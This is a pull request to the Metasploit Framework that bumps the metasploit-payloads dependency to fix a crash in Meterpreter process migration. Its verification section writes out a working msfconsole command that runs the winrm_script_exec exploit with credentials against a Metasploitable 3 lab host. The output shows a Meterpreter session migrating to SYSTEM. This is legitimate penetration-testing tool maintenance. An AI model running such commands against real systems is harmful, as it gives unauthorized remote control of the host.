### PR TITLE
Fix Meterpreter migration crash

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -45,7 +45,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 2.0.234)
+      metasploit-payloads (= 2.0.235)
       metasploit_data_models (>= 6.0.7)
       metasploit_payloads-mettle (= 1.0.45)
       mqtt
@@ -348,7 +348,7 @@ GEM
       drb
       mutex_m
       railties (~> 7.0)
-    metasploit-payloads (2.0.234)
+    metasploit-payloads (2.0.235)
     metasploit_data_models (6.0.9)
       activerecord (~> 7.0)
       activesupport (~> 7.0)

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -74,7 +74,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.234'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.235'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.45'
   # Needed by msfgui and other rpc components


### PR DESCRIPTION
Fixes a crash when performing the `migration` command in a Meterpreter session

https://github.com/rapid7/metasploit-payloads/pull/780

## Verification

Target: metasploitable 3 windows

### Before 🔴 

```
$ git checkout 0b1ec457b1dd201f294bc7ca1a22402a3f5d1f85
bundle && bundle exec ruby ./msfconsole --no-defer-module-loads -qx 'use windows/winrm/winrm_script_exec; run username=vagrant password=vagrant rhost=10.140.10.33 payload=windows/x64/meterpreter/bind_tcp'
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[*] Checking for Powershell 2.0
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\vagrant\AppData\Local\Temp\JnWzhpxw.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Started bind TCP handler against 10.140.10.33:4444
[-] The connection was refused by the remote host (10.140.10.33:4444).
[*] Sending stage (230982 bytes) to 10.140.10.33
[*] Session ID 1 (10.4.225.3:61566 -> 10.140.10.33:4444) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is powershell.exe (5592) as: VAGRANT-2008R2\vagrant
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (668)
[*] 10.140.10.33 - Meterpreter session 1 closed.  Reason: Died
```


### After 🟢 

```
msf exploit(windows/winrm/winrm_script_exec) > run username=vagrant password=vagrant rhost=10.140.10.33 payload=windows/x64/meterpreter/bind_tcp
[*] Checking for Powershell 2.0
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\vagrant\AppData\Local\Temp\FyXLaUCn.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Started bind TCP handler against 10.140.10.33:4444
[-] The connection was refused by the remote host (10.140.10.33:4444).
[*] Sending stage (230982 bytes) to 10.140.10.33
[*] Session ID 2 (10.4.225.3:49760 -> 10.140.10.33:4444) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is powershell.exe (1264) as: VAGRANT-2008R2\vagrant
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (668)
[+] Successfully migrated to services.exe (668) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 2 opened (10.4.225.3:49760 -> 10.140.10.33:4444) at 2025-10-24 13:56:03 +0100

meterpreter > 
```

